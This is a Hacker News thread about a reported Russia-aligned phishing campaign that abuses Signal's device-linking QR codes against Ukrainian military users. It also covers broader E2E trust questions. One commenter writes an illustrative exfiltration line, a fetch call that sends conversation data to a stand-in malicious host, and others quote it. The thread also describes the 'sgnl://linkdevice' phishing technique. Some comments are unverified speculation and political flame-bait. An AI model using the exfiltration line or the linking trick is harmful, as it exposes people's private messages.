It certainly doesn't help that signal themselves have discounted this attack (quoted from the iacr eprint paper):
If I'm reading that right, the attack assumes the attacker has (among other things) a private key (IK) stored only on the user's device, and the user's password.
Thus, engaging on this attack would seem to require hardware access to one of the victims' devices (or some other backdoor), in which case you've already lost.
Correct me if I'm wrong, but that doesn't seem particularly dangerous to me? As always, security of your physical hardware (and not falling for phishing attacks) is paramount.
No, it means that if you approve a device to link, and you later have reason to unlink the device, you can't establish absolutely that the unlinked device can no longer access messages, or decrypt messages involving an account, breaking the forward-secrecy guarantees.
That leaves you with the only remedy for a signal account that has accepted a link to a 'bad device' being to burn the whole account. (maybe rotating safety numbers/keys would be sufficient, i am uncertain there) -- If you can prove the malicious link was only a link, then yeah, the attack i described is incomplete, but the issues in general with linked devices and remedies described are the important bits, I think.
That's not what the attack does tho - they have access to your private key so they can complete the linking protocol without your phone and add as many devices as they want (up to the allowed limit). If you add a bad device, you are screwed from that moment on, assuming you don't sync your chat history.
You can always see how many devices a user has: they have a unique integer id so if I wanna send you a message, I generate a new encrypted version for each device. If the UI does not show your devices properly than that is an oversight for sure, but I don't think it's the case anymore.
Either way, you'd have to trust that the Signal server is honest and tells you about all your devices. To avoid that, you need proofs that every Signal user has the save view on your account (keys), which is why key transparency is such an important feature.
That sounds exactly like what GP wrote.
That is really quite bad.
It sounds like all that's needed is a device that had been linked in the past. Unlinking doesn't have the security requirements you'd think it would and there's a phishing attack to make scanning a QR code trigger a device link (which seems really really bad if the user doesn't even have to take much action)
Your phone (primary device) and the linked ones have to share the IK since that is the "root of trust" for you account: with that you generate new device keys, renew them and so on.
Those keys are backed by Keystore on Android, and some similar system on Windows/Linux, i'd assume the same for MacOS/iOS (but I don't know the details) so it's not as simple as just having access to your laptop, they'd need at least root.
Phishing is always tricky, probably impossible to counter sadly - each one of us would be susceptible at the wrong moment.
I think the point is that as a user you expect revocation of trust to protect you going forward, yet it doesn’t (e.g. the server shouldn’t be forwarding new messages to). That’s a design decision Signal made but clearly it’s one that leaves you open to harm. Moreover, it’s a dangerous decision because after obtaining the IK in some way (e.g. stolen device) you’re able to then essentially surreptitiously take over the account without the user ever knowing (i.e. no phishing needed). As an end user these are surprising design choices and that Signal discounted this as not part of their threat model to me suggest their threat model has an intentional or unintentional hole; second-hand devices that aren’t wiped are common & jail breaks exist.
This isn’t intractable either. You could imagine various protocols where having the IK is insufficient for receiving new messages going forward or impersonating sending messages. A simple one would be that each new device establishes a new key that the server recognizes as pertaining to that device and notifications are encrypted with a per-device key when sending to a device and require outbound messages to be similarly encrypted. There’s probably better schemes than this naive approach.
Revocation of trust is always a tricky issue, you can look at TLS certificates to see what a can of worms that is.
The Signal server does not forward messages to your devices, and the list of devices someone has (including your own) can and has to be queried to communicate with them, since each device will establish unique keys signed by that IK, so it isn't as bad as having invisible devices that you'd never aware of. That of course relies on you being able to ensure the server is honest, and consistent, but this is already work in progress they are doing.
I think most of the issue here doesn't lie in the protocol design but in (1) how you "detect" the failure scenarios (like here, if your phone is informed a new device was added, without you pressing the Link button, you can assume something's phishy), (2) how do you properly warn people when something bad happens and (3) how do you inform users such that you both have a similar mental model. You also have to achieve these things without overwhelming them.
I would be surprised if there aren’t ways to design it cryptographically to ensure that an unlinked device doesn’t have access to future messages. The problem with how Signal has designed it is that is a known weakness that Signal has dismissed in the past.
“Just install this chrome browser extension” is all it takes now. Hell, you can even access cookies and previously visited sites from within the browser. All it takes is some funky ad, or chrome extension, or some llama-powered toolbar to gain access to be able to do exactly that.
Background services on devices has been a thing for a while too. Install an app (which you grant all permissions to when asked) and bam, a self-restarting daemon service tracking your location, search history, photos, contacts, notes, email, etc
How is that related in any way to Signal?
My point is that anything you install on your device is a vector. Can install MITM attacks. Can read your data, etc. Sidecar attacks.
This was classic phishing though
This is my read as well. Just double clicking here.
The attack in that paper assumes you have compromised the user's long term private identity key (IK) which is used to derive all the other keys in the signal protocol.
Outside of lab settings, the only way to do that is: - (1) you get root access to the user's device - (2) you compromise a recent chat backup
The campaign Google found is akin to phishing, so not as problematic on a technical level. How do you warn someone they might be doing something dangerous in an entire can of worms in Usable Security... but it's gonna become even more relevant for Signal once adding a new linked device will also copy your message history (and last 45 days of attachments).
If one doesn't use the linked device feature, does that impact this threat surface?
About the paper: if someone has gotten access to your identity (private) key, you are compromised, either with their attack (adding a linked device) or just getting MitM'ed and all messages decrypted. The attacker won.
The attack presented by Google is just classical phishing. In this case, if linked devices are disabled or don't exist, sure, you're safe. But if the underlying attack has a different premise (for example, "You need to update to this Signal apk here"), it could still work.
One thing I'm realizing more and more (I've been building an encrypted AI chat service which is powered by encrypted CRDTs) is that "E2E encryption" really requires the client to be built and verified by the end user. I mean end of the day you can put a one-line fetch/analytics-tracker/etc on the rendering side and everything your protocol claimed to do becomes useless. That even goes further to the OS that the rendering is done on.
The last bit adds an interesting facet, even if you manage to open source the client and manage to make it verifiably buildable by the user, you still need to distribute it on the iOS store. Anything can happen in the publish process. I use iOS as the example because its particularly tricky to load your own build of an application.
And then if you did that, you still need to do it all on the other side of the chat too, assuming its a multi party chat.
You can have every cute protocol known to man, best encryption algorithms on the wire, etc but end of the day its all trust.
I mention this because these days I worry more that using something like signal actually makes you a target for snooping under the false guise that you are in a totally secure environment. If I were a government agency with intent to snoop I'd focus my resources on Signal users, they have the most to hide.
Sometimes it all feels pointless (besides encrypted storage).
I also feel weird that the bulk of the discussion is on hypothetical validity of a security protocol usually focused on the maths, when all of that can be subverted with a fetch("https://malvevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?
You will always have to root your trust in something, assuming you cannot control the entire pipeline from the sand that becomes the CPU silicone, through the OS and all the way to how packets are forwarded from you to the person on the other end.
This makes that entire goal moot; eliminating trust thus seems impossible, you're just shifting around the things you're willing to trust, or hide them behind an abstraction.
I think what will become more important is to have enough mechanisms to be able to categorically prove if an entity you trust to a certain extent is acting maliciously, and hold them accountable. If economic incentives are not enough to trust a "big guy", what remains is to give all the "little guys" a good enough loudspeaker to point distrust.
A few examples: - certificate transparency logs so your traffic is not MitM'ed - reproducible builds so the binary you get matches the public open source code you expect it does (regardless of its quality) - key transparency, so when you chat with someone on WhatsApp/Signal/iMessage you actually get the public keys you expect and not the NSA's
> This makes that entire goal moot
I agree. Perhaps it's why I find the discussions like nonce-lengths and randomness sources almost insane (in the sense of willfully missing the forrest from the trees). Intelligence agencies have managed to penetrate the most secretive and powerful organizations known to man. Why would one think Signal's supply chain is impervious? I'd assume the opposite.
But depending on your threat model, it can still be useful. If a state actor has a backdoor into something, would they burn that capability to get you? If you are a dissident in a totalitarian government, you would expect them to throw everything at you and not tell anyone how/why. If you are terrorizing and could be tried in a “classified” setting, you would expect them to throw everything at you. If you are Jane Average passing nudes and talking about doing a little Molly last weekend and would have a lawyer go through discovery, you are probably safe.
I don't think they are insane, they are quite useful when designing security mechanisms, while at the same time being utter noise for the end-user benefiting from that system.
> If you're building a chip to generate prime numbers I do surely hope you know how to select randomness or make constant time & branch free algorithms, just like an engineer designing elevators better know what should be the tensile strength of the cable it'll use. In either cases, it's mumbo jumbo for me, and I just need to get on with my day.
Part of what muddies the water is our collective inability to separate the two contexts, or empower tech communicators to do it. If we keep making new tech akin to esoteric magic, no one will board the elevator.
I almost find it worse. Using your analogy its akin to doing atomic simulations on the elevator cable quality, but the elevator car is missing a bottom/floor.
I agree with you that the cart seems to be moving ahead of the horse, in that there is an increasing fixation on the theoretical status of the encryption scheme rather than the practical risk of various outcomes. An important facet of this is that systems that attempt to be too secure will prevent users from reading their own messages and hence will induce those users to use "less secure" systems. (This has been a problem on Matrix, where clients have often not clearly communicated to users that logging out can result in permanently missed messages.)
There's a part of me that wonders whether some of the more hardcore desiderata like perfect forward secrecy are, in practical terms, incompatible with what users want from messaging. What users want is "I can see all of my own messages whenever I want to and no one else can ever see any of them." This is very hard to achieve. There is a fundamental tension between "security" and things like password resets or "lost my phone" recovery.
I think if people fully understood the full range of possible outcomes, a fair number wouldn't actually want the strongest E2EE protection. Rather, what they want are promises on a different plane, such as ironclad legal guarantees (an extreme example being something like "if someone else looks at my messages they will go to jail for life"). People who want the highest level of technical security may have different priorities, but designing the systems for those priorities risks a backlash from users who aren't willing to accept those tradeoffs.
At a casual glance, any E2EE system can be reduced to your ironclad legally guaranteed (ILG) system by having the platform keep a copy of the key(s), for instance. So it doesn't have to be a one-or-the-other choice.
How does giving the platform the keys guarantee legal consequences for them if they use the keys to read your messages?
> Sometimes it all feels pointless
Building anything that's meant to be properly secure - secure enough that you worry about the distinction between E2E encryption and client-server encryption - on top of iOS and Google Play Services is IMO pretty pointless yes. People who care about their security to that extent will put in the effort to use something other than an iPhone. (The way that Signal promoters call people who use cryptosystems they don't like LARPers is classic projection; there's no real threat model for which Signal actually makes sense, except maybe if you work for the US government).
> I also feel weird that the bulk of the discussion is on hypothetical validity of a security protocol usually focused on the maths, when all of that can be subverted with a fetch("https://malvevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?
There's definitely a streetlight effect where academic cryptography researchers focus on the mathematical algorithms. Nowadays the circle of what you can get funding to do security research on is a little wider (toy models of the end to end messaging protocol, essentially) but still not enough to encompass the full human-to-human part that actually matters.
> I also feel weird that the bulk of the discussion is on hypothetical validity of a security protocol usually focused on the maths, when all of that can be subverted with a fetch("https://malvevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?
I think your comment in general, and this part in particular, forgets what was the state of telecommunications 10-15 years ago. Nothing was encrypted. Doing anything on a public wifi was playing russian roulette, and signal intelligence agencies were having the time of their lives.
The issues you are highlighting _are_ present, of course; they were just of a lower priority than network encryption.
I think that part of what you are talking about is sometimes called "attestation". Basically a signature, with a root that you trust that confirms beyond doubt the provenience of the entity (phone + os + app) that you interact with.
Android has that and can confirm to a third party if the phone is running for example a locked bootloader with a Google signature and a Google OS. It's technically possible to have a different chain of trust and get remote parties to accept a Google phone + a Lineage OS(an example) "original" software.
The last part is the app. You could in theory attest the signature on the app, which the OS has access to and could provide to the remote party if needed.
A fully transparent attested artifact, which doesn't involve blind trust in a entity like Google, would use a ledger with hashes and binaries of the components being attested, instead of root of trust of signatures.
All of the above are technically possible, but not implemented today in such a way to make this feasible. I'm confident that with enough interest this will be eventually implemented.
> "E2E encryption" really requires the client to be built and verified by the end user
We probably agree that this is infeasible for the vast majority of people.
Luckily reproducible builds somewhat sidestep this in a more practical way.
I'll feel pessimistic like this, but then something like Tinfoil Chat [0] comes along and sparks my interest again. It's still all just theoretical to me, but at least I don't feel so bad about things.
With a little bit of hardware you could get a lot of assurance back: "Optical repeater inside the optocouplers of the data diode enforce direction of data transmission with the fundamental laws of physics."
[0] https://github.com/maqp/tfc
> "E2E encryption" really requires the client to be built and verified by the end user
But the OS might be compromised with a screen recorder or a keylogger. You'd need the full client, OS and hardware to be built by the end user. But then the client that they're sending to might be compromised... Or even that person might be compromised.
At the end of the day you have to put your trust somewhere, otherwise you can never communicate.
It’s primarily to guard against insider threats - E2E makes it very hard for one Signal employee to obtain everyone’s chat transcripts.
Anyone whose threat model includes well-resourced actors (like governments) should indeed be building their communications software from source in a trustworthy build environment. But then of course you still have to trust the hardware.
tl;dr: E2E prevents some types of attacks, and makes some others more expensive; but if a government is after you, you’re still toast.
> tl;dr: E2E prevents some types of attacks, and makes some others more expensive; but if a government is after you, you’re still toast.
This is sorta my point, lots of DC folks use Signal under the assumption they're protected from government snooping. Sometimes I feel like it could well have the opposite effect (via the selection bias of Signal users).
It is not plainly stated in the article, but as far as I understand, the first step of one of the attacks is to take the smartphone off a dead soldier’s body.
The article says they phish people into linking adversarial devices to their Signal:
> [...] threat actors have resorted to crafting malicious QR codes that, when scanned, will link a victim's account to an actor-controlled Signal instance. If successful, future messages will be delivered synchronously to both the victim and the threat actor in real-time, [...]
There's a new feature to sync old messages that seems like it could potentially make that attack vector ten times worse:
https://www.bleepingcomputer.com/news/security/signal-will-l...
Would a malicious URL be able to activate this feature as part of the request?
Probably not, in any normal case a secondary device shouldn't have that kind of authority to dictate.
It is more concerning if the toggle is on by default and then you carelessly press next (on this or some other kind of phish).
Is this serious?
It raises questions about smartphones being standard equipment for soldiers, but they do give every soldier an effective, powerful computing and communication platform (that they know without additional training).
The question is how to secure them, including against the risk described in the parent. That seems like a high risk to me I would expect someone is working on how to secure them enough that even Russian intelligence doesn't have an effective exploit.
The solutions may apply well to civilian privacy too, if they ever become more widespread. It wouldn't be the worst idea to secure Ukrainian civilian phones against Russian attackers.
I seem to recall uploaded selfies being a frequent source of problems. For example: https://www.rferl.org/a/trench-selfies-tracking-russia-milit...
Phones aren’t secure but are more secure than the standard radios most have access to.
Encrypted milspec comms aren’t the standard in a massive war.
It’s weird but discord, signal and some mapping apps on smartphones are how this war is being fought.
> Encrypted milspec comms aren’t the standard in a massive war.
It is standard in any modern military that is actually prepared for war. It's not like encrypted digital radio is some kind of fancy tech, either - it's readily available to civilians.
Ukraine in particular started working on a wholesale switch to encrypted Motorola radios shortly after the war began in 2014, and by now it's standard equipment across their forces. Russia, OTOH, started the war without a good solution, with patchwork of ad hoc solutions originating from enthusiasts in the units - e.g. https://en.wikipedia.org/wiki/Andrey_Morozov was a vocal proponent.
But smartphones are more than communications. You can also use them as artillery computers for firing solutions, for example. And while normally there would be a milspec solution for this purpose, those are usually designed with milspec artillery systems and munitions in mind, while both sides in this war are heavily reliant on stocks that are non-standard (to them) - Ukraine, obviously, with all the Western aid, but Russia also had to dig out a lot of old equipment that was not adequately handled. Apps are much easier to update for this purpose, so they're heavily used in practice (and, again, these are often grassroots developments, not something pushed top-down by brass).
At the start of the invasion in Ukraine it was possible for a while to listen to unencrypted radio comms from Russian convoys, hosted online live.
Russians aren't allowed to bring phones on the frontlines apparently but Ukranians often do still as they have the combat management app which is critical to operations. I've always wondered if this is why there's far more published footage of Ukranian combat video than Russian. Beyond the donation incentive they attached to videos when publishing them on Youtube/Telegram.
In the first weeks of the war you could see Russian armored columns clearly on Google Maps as heavy traffic (along with other military activity but the columns really stood out). https://www.theverge.com/2022/2/28/22954426/google-disables-...
> I've always wondered if this is why there's far more published footage of Ukranian combat video than Russian.
I'm sure Russia's meat wave tactics have more of a role. If you're sending your troops in suicide missions, including guys without weapons and even in crutches, you're not exactly too keen in having them carrying mobile phones to document the experience or even, heavens forbid, survive by surrendering.
This meatwave meme needs to die. Again ,if Ukrainians are being beaten by guy in crutches,it says so much about this NATO armed and trained force
> This meatwave meme needs to die.
Are you sure it's a meme, though? There is plenty of footage out there, documenting meat wave tactics in 4k. Have you been living under a rock?
> Again ,if Ukrainians are being beaten by guy in crutches (...)
What's your definition of "being beaten"? Three years into Russia's 3-day invasion of Ukraine and Ukraine started invading and occupying Russian territory. Is this your definition of being beaten?
I'm not sure how applicable the NATO training is in this war. It's a trendsetter for sure
I think a large chunk of the footage is taken by gopros or similar, not smartphones.
And I think a pretty much all published Ukrainian and Russian combat footage is vetted by their respective military (who would want to be court martialed for Reddit karma?).
They just take different approaches to what, when and were to release the footage.
Where is the fighting, and who runs the cellular networks in that area?
I’d want to run military communications on a network my side controls
A radio on a soldier is already a dangerous communications device - with a radio you can call in artillery strikes, for example.
There's no particular need IMO to secure smartphones on the battlefield in anyway beyond standard counter-measures - i.e. encrypt the storage, use a passcode unlock.
The Russian military would beg to differ, see the sibling's comment: https://news.ycombinator.com/item?id=43106162
That's referring to people literally posting selfies online (with the result of giving away their location by either metadata or geo-guessing).
Which is a process and procedure issue, more then a security issue on the phones themselves (except in so far as it's really obvious there's a solid need for an OS for a battlefield device which strips all that stuff out by default).
Smartphones store data; radios (depending on the radio) do not. The Russian military likely has tools for bypassing typical security.
Soldiers are not allowed to carry a cell phone.
Clearly, some folks didn't get the memo.
https://www.cbc.ca/news/world/russia-troops-cellphone-ukrain...
Is this suggesting that a single QR scan can on its own perform the device linking? If so, it seems like that's kind of the hole here, right? Like you shouldn't be able to scan a code that on its own links the device; you should have to manually confirm with like "Yes I want to link to this device". And then if you thought you were scanning a group invite code you'd realize you weren't. (Yeah, you'd still have to realize that, but I think it's a meaningful step up over just "you scanned a code to join a group and instead it silently linked a different device".)
> you should have to manually confirm with like "Yes I want to link to this device". And then if you thought you were scanning a group invite code you'd realize you weren't. (Yeah, you'd still have to realize that, but I think it's a meaningful step up over just "you scanned a code to join a group and instead it silently linked a different device".)
Remember that Signal is designed for non-technical users. Many/most do not understand QR codes, links, linking, etc, and they do not think much about it. They take an immediate, instinctive guess and click on something - often to get it off the screen so they can go back to what they were doing.
Do you have reason to think there is not confirmation? Maybe Signal's documentation will tell you.
> Do you have reason to think there is not confirmation?
The reason is just that in the article it says:
> threat actors have resorted to crafting malicious QR codes that, when scanned, will link a victim's account to an actor-controlled Signal instance
That phrasing suggests to me that the scanning of the QR code, on its own, performs the linking. That may not be the case, but if so I'd say the wording is misleading or at least imprecise.
In fairness, I think it's misleading to you due to the details you are interested in. They don't say otherwise and they can't lay out every detail that anyone might be interested in; it's not an RFC.
> Maybe Signal's documentation will tell you.
Not the person you replied to, but I just tried googling half a dozen different terms and got results that have nothing to do with Signal.
> Remember that Signal is designed for non-technical users.
That does not prevent them from putting up a warning message that says "You just scanned a code which will allow another device to read all future messages sent to you, and send messages from your identity. Are you sure you want to do that? And the button says "link devices", not "yes" or "no."
I think the frustration here is that Signal petulantly and paternalistically refuses to allow you to fully sync to another device (and for years refused to even allow you to back up messages) because supposedly we can't be trusted with such a thing...but then they leave the QR code system so idiotically designed it's apparently trivial to phish people into linking their devices to malicious actors?
Why the fuck does scanning a QR code, without having first selected "link device", even open that dialog? Or require a PIN code they obsessively force us to re-enter all the time?
It's obviously ripe for abuse.
We admonish people for piping a remote document into their shell but a QR code that links devices with one click is OK?
> That does not prevent them from putting up a warning message that says "You just scanned a code which will allow another device to read all future messages sent to you, and send messages from your identity. Are you sure you want to do that? And the button says "link devices", not "yes" or "no."
As an experiment, I just linked a device to my Signal account. After clicking "Link new device" in Signal, and then scanning the QR code, a dialog popped up: "Link this device? This device will be able to see your groups and contacts, access your chats, and send messages in your name. [Cancel] [Link new device]"
If I scan the QR code with Google Lens instead, it reads and displays the sgnl://linkdevice... URL but does not launch (or offer to launch) Signal.
Related: https://www.wired.com/story/russia-signal-qr-code-phishing-a... (https://web.archive.org/web/20250219110740/https://www.wired..., https://archive.ph/MbR9e)
(via https://news.ycombinator.com/item?id=43103692, but no comments there)
The good news is the target is targeted for a reason: it's still effective.
There are many voices which try to tell you that signal is compromised. Notice that all of those voices have less open-source-ness than Signal in virtually all cases.
Signal is doing its best to be a web scale company and also defend human rights. Individual dignity matters.
This is not a simple conversation.
> There are many voices which try to tell you that signal is compromised.
But compromised by whom? Russian, US Intelligence? I am really confused.
I just looked quickly on on the Signal Foundation website and the board members, I read things like:
> Maher is a term member of the Council on Foreign Relations, a World Economic Forum Young Global Leader, and a security fellow at the Truman National Security Project.
> She is an appointed member of the U.S. Department of State's Foreign Affairs Policy Board
> She received her Bachelor's degree in Middle Eastern and Islamic Studies in 2005 from New York University's College of Arts and Science, after studying at the Arabic Language Institute of the American University in Cairo, Egypt, and Institut français d'études arabes de Damas (L'IFEAD) in Damascus, Syria.
Those type of people sound part of the intelligence world to me. What exactly are they doing on the board of Signal (an open source messaging app)?
> This is not a simple conversation.
I agree
And Telegram specifically bad here. Using custom crypto on custom protocol and dont have any E2EE by default whatsoever storing everything on server in plain text.
Also, it's a tricky environment of disinformation generally, and in particular for anything valuable like Signal. If Signal is secure, attackers on privacy would want people to believe Signal is compromised and to use something else. If it's not, then they would want people to believe Signal is secure.
I think the solution is to completely ignore any potential disinfo source, especially random people on social media (including HN). It's hard to do when that's where the social center is - you have to exclude yourself. Restrict yourself to legitimate, trusted voices.
I would also read it from another perspective. Attackers, especially at the level of nation states, will always try to get as many avenues for achieving their goals as possible.
If you have compromised a service, it would be in your interest to make it more popular (assuming you think you are the only one in possession of it).
If you cannot, you don't give up; you just go back to the drawing board (https://xkcd.com/538/). Maybe I don't need to break Signal if I can just rely on phishing or scare tactics to get what I want.
> web scale
I didn't realize anyone still used that term with a straight face.
"MongoDB is web scale, you turn it on and it scales right up."
I've struggled occasionally with trying to describe a similar concept without using that tainted term.
You can check for unexpected linked devices in the settings menu.
I wonder if Signal should expose linked devices directly in the UI at all times. Something like a small icon that indicates "You have 3 linked devices active" or similar.
Would probably lead to notification fatigue.
Showing a big snackbar when a new device is added is probably enough, especially if the app can detect there was no "action" on your phone that triggered it.
Key transparency, once rolled out, would help to ensure there is no lingering "bad" device around, but phishing will always be a problem.
"Would probably lead to notification fatigue."
Probably true...
> Showing a big snackbar when
A big... what?
Can you tell me what this new lingo is for someone who doesn't use the latest and shittiest marketing lingo?
It’s UI design language: https://developer.android.com/reference/com/google/android/m...
> latest and shittiest marketing lingo
It exists since Android 6: https://developer.android.com/reference/com/google/android/m...
Informative banner that does not require user interaction to dismiss.
Snackbar isn't a particularly new term, it goes back, IIRC, to the first version of Material Design and is similar to a toast but different in that snackbars may support interaction whereas toasts are non-interactive.
An in-app notification along the bottom of your screen. Usually just some text on a dark grey or black background.
> shittiest marketing lingo
Is that what you call the words you don't understand?
I think the trouble is information overload is a bit of a thing in this case. It's information that is 99% of the time useless, except the one time it isn't. But also, to an informed user is much less of a threat - the threat is anyone you interact with getting compromised.
EDIT: Like an analytics based approach would probably be far more useful - popping up a confirmation for example if GeoIP shows a device is far removed from all the others, which for most people would be true unless they were traveling.
Great idea, I'll send you a QR code...
They provided some domains, but not all of them are taken. For example, signal-protect[.]host is available, kropyva[.]site is available, signal-confirm[.]site is registered in Ukraine. Some of them are registered in Russia.
Never trust a country at war—any side. Party A blames B, Party B blames A, but both have their own agenda.
>signal-confirm[.]site is registered in Ukraine
The WHOIS is usually fake made up data so don't know why you are using that to claim it's registered in Ukraine. Russia is also known to use stolen credentials, SIM cards etc. from their neighbouring countries, including Ukraine, for things like this.
Then why should I trust the article at all? If WHOIS data is fake and stolen credentials are common (which I don't disagree with), I could register a domain, put your name on it, and make it look like you're behind the phishing. Would that make it true? After all, in war, deception is a legitimate tactic.
I believe you are making a mistake by thinking that since a malicious actor's domain is registered in Ukraine, it automatically must be doing something in the interests of Ukraine, or at least be known to its officials.
Lots of Russian state actors have no problems working from within Ukraine, alas. Add to this purely chaotic criminal actors who will go with the highest bidder, territories temporarily controlled by Russians that have people shuttle to Ukraine and back daily, and it becomes complicated very quickly.
Fair point. Just because a domain is registered in Ukraine doesn't mean it's acting in Ukraine's interests. But that works both ways. If Russian actors can operate from Ukraine, then Ukrainian actors (or others) can also operate from Russia, or at least make it look that way. Cyber attacks originating from Ukraine and targeting Russia aren't uncommon either, which only adds to the complexity of attribution.
The issue isn't just attribution but also affiliation. When similar attacks come from Ukraine targeting Russia, Google stays quiet. I understand that Russia invaded Ukraine, not the other way around, but given the complexity of the conflict, aligning with one side in cyber warfare reporting is a questionable move. At the end of the day, attacks will come from both sides - it's a war, after all.
Edit: when I say 'questionable move', I'm specifically referring to Google. It's unclear what they were trying to achieve with this article, is it a political statement or just a marketing piece showcasing how good GTIG is? Or both?
Ukrainian military are moving from Telegram, which presumably still has some ties to Russia despite the claims. And this is yet another phishing campaign in Ukrainian language that makes use of Ukrainian-registered domains to host fake Signal group invites to make Ukrainian military join and link their devices to an adversary-controlled machine. Who might be behind that attack? Hmm, let me think... I don't know! Probably Ukrainians themselves. Or it might be the US. Might as well be the Martians. We will never know the real truth, after all nobody is to be trusted during the war!
Stop the tiresome FUD please. This war is surprisingly straightforward by the standards of the last century, it's literally out of some decades-old textbook. Let's not drag this discussion here again. If you have specific issues with Google's attribution here, please state them, HN is pretty aware that attribution can be shaky. My only gripe with the article is the clickbait title: nobody says that someone is "targeting e-mail" about e-mail phishing.
> Lots of Russian state actors have no problems working from within Ukraine, alas.
Ex: Viktor Yanukovych, prior to being ousted.
An unregistered domain can still be an IoC especially when found through e.g. payload analysis.
Oceania had always been at war with Eastasia.
"Russia-aligned threat"... so... the US?
> In each of the fake group invites, JavaScript code that typically redirects the user to join a Signal group has been replaced by a malicious block containing the Uniform Resource Identifier (URI) used by Signal to link a new device to Signal (i.e., "sgnl://linkdevice?uuid="), tricking victims into linking their Signal accounts to a device controlled by UNC5792.
Missing from their recommendations: Install No Script: https://noscript.net/
No Script is a browser extension. Signal is an Android/Ios/Electron app so no
In each of the fake group invites, JavaScript code that typically redirects the user to join a Signal group has been replaced by a malicious block containing the Uniform Resource Identifier (URI) used by Signal to link a new device to Signal (i.e., "sgnl://linkdevice?uuid="), tricking victims into linking their Signal accounts to a device controlled by UNC5792.
Source: https://cloud.google.com/blog/topics/threat-intelligence/rus...
They should add an option to not allow linking additional devices, if that’s feasible.
> Android supports alphanumeric passwords, which offer significantly more security than numeric-only PINs or patterns.
Ironic, coming from Google. As Android is THE only OS where usage of alphanumeric passwords is nearly impossible, as Android limits the length of a password to arbitrary 16 characters, preventing usage of passphrases.
Kind of a good sign for signal's security that this is the best Russia has got!
I wouldn’t assume that but I also wouldn’t recommend against using Signal.
That we know of
Yeah, this just gave me the last nudge I needed to give Signal a go.
Last week it was Microsoft, now Signal, who’s next?
https://www.microsoft.com/en-us/security/blog/2025/02/13/sto...
I hate to break it to you, but threat actors aligned with any major state are targeting everything with an Internet presence all of the time.
Am I reading this right? You can initiate device linking in Signal by clicking on an external URL? This is so stupid, I don't even have words for this. In a security-focused app you should not be able to link anything, without manually going into the devices/link menu and clicking "link new device".
Can't view the article, as I am an evil Tor user.
Me too, but I was able to access the article through the Internet Archive:
https://web.archive.org/web/20250219202428/https://cloud.goo...
“Russia's re-invasion of Ukraine”
Reading this for the first time, what is a “re-invasion”? Do they mean the explained cyber attack as second invasion aka “re-invasion”?
Invasion of Crimea 2014
Re-invasion in February 2022
Signal should be doing something well.
Phone verification is a common method used here.
If somehow, the victims phone provider can be compromised or coerced into cooperating, the government actor can intercept the text message Signal and others use for verification and set up the victims account on a new device.
It's very easily done if the victim is located in an authoritarian county like Russia or Iran, they can simply force the local phone provider to co-operate.
> government actor can intercept the text message Signal and others use for verification and set up the victims account on a new device
Yes, but if they only control the phone number, you they will register a new account (different cryptographic keys) for you, which is why everyone previously chatting with you will get that "Your Safety Number with Bob changed" message.
that's nice they provided a list of bad domains
Honestly don't use Signal for privacy or anonymity. I switched to it because it is not owned by a sycophant of Trump.
Oh how Americans make fun of the CCP but watching all the tech bros bend the knee was embarrassing.
"Russia-aligned threat actors" has a whole new meaning this last week.
I wonder if someone in the US will declare that, actually, Signal is actively targeting the Russia-aligned threat actors.
Or that Signal shouldn't have started it in the first place
Indeed. It now potentially includes a very long list of Americans.
What does that mean?
Trump and his voters.
Not sure why hating Russia should be treated as axiomatic.
tldr: they mostly use phishing with fake ukrainian army group invites to trick people (from ukrainian army) to link the phone device to a attacker-controlled PC.
Also they try to get the actual database SQL files from Windows devices and Android devices.
I'd love to have more of my socializing happening on Signal. Anyone got a good way to convince the non-paranoid to use it?
"Sorry, I only use Signal" has worked nearly a decade for me
Virtue Signalling!
Which is bad, how?
It's a joke, because virtue signaling (or whatever name you want to give it) is bad, but Signal the messenger app is good so it's a play on words.
It’s not bad. It just IS.
the only people that think it is bad are people who have a different opinion and feel attacked for whatever reason. I find it telling when people accuse others of virtue signaling because it is almost always someone who is jealous or insecure attacking said signaler.
"Virtue signaling" in theory means "talking the talk without walking the walk", but it's generally thrown out by people who make no effort to assess whether the person criticized is walking the walk or even in contradiction of such evidence.
Driving an economically efficient car -- choosing any sort of car -- has enormous consequences on one's life, for example. Choosing to by a particular car isn't a decision made lightly. But Prius drivers back in the day were accused of virtue signaling, as though the Prius were equivalent to a temporary tattoo.
In fact, speaking of temporary tattoos, simply having a bumper sticker advocating for animal rights, say, belief in anthropogenic climate change, or peace in the Middle East will expose one to regular displays of hostility and aggression, so it isn't a cheap signal.
In other words, in my experience your observation is spot on.
> "Virtue signaling" in theory means "talking the talk without walking the walk"
Virtue signaling means sending deliberate signals about your virtues, whether you "walk the walk" or not. People are often critiqued for going to uncomfortable lengths to signal their virtues, but something as simple as a "meat is murder" shirt or a MAGA hat is also virtue signaling.
What if you need to contact someone and they use whatsapp?
What if they want to contact you and you use Signal?
Luckily, with the technological advances in the last months, it is now possible to install more than one app on a phone at a time.
It is also possible to communicate without using Meta services.
Good luck with that depending on where you live.
And when you live. The 20s-30s year old crowd I interact with seems to avoid, if not mock FB. I recognize it has its uses and benefits, though.
They mock fb whilst they use instagram and WhatsApp.
> it is now possible to install more than one app on a phone at a time.
And, in doing so, achieve the security posture of the worse of the apps!
IME you say “Sorry I only use Signal” and either they change or you don’t get in contact with that person.
If you change and abandon your principles were they really principles in the first place?
How do you tell that to them in the first place? You got someone's phone number. The person who gives it to you tells them that they use whatsapp. You can't even tell them "Sorry I only use Signal" unless you open whatsapp app.
You realise you could use that phone number to...call them and let them know? Also - in what situation are they giving you a phone number and telling you they use WhatsApp but you having no way to respond when receiving that info? If it's in person you can explain at the time. If it's taken from a website, call them. Or you can even fall back on SMS.
Presumably at the time they've given you their phone number, they've told you that they are on WhatsApp, and then you've responded directly that you're only on Signal.
If there is a communications channel by which they can give you their phone number, you can use that same channel to discuss what messenger to use.
If they can't reach you via whatsapp, they will call you.
Not GP - I tolerate Whatsapp but I draw the line at SMS.
For me it's the other way around: I tolerate SMS but I draw the line at Whatsapp.
Sounds like someone who never had to pay for each SMS.
RCS?
If you really really really need to? You use Whatsapp.
If you don't need to? You tell them to get Signal.
You call them. Or use SMS. Or use e-mail.
same
Take time with the people to do the boring stuff on their phone/computer:
- install [the thing]
- start it, show how it works
- search for yourself, start a convo, exchange messages
- add them to the group
IME the friction comes from having to do the first step, because it's really an annoyance no one cares about, so if you take it for yourself and do it they'll like that
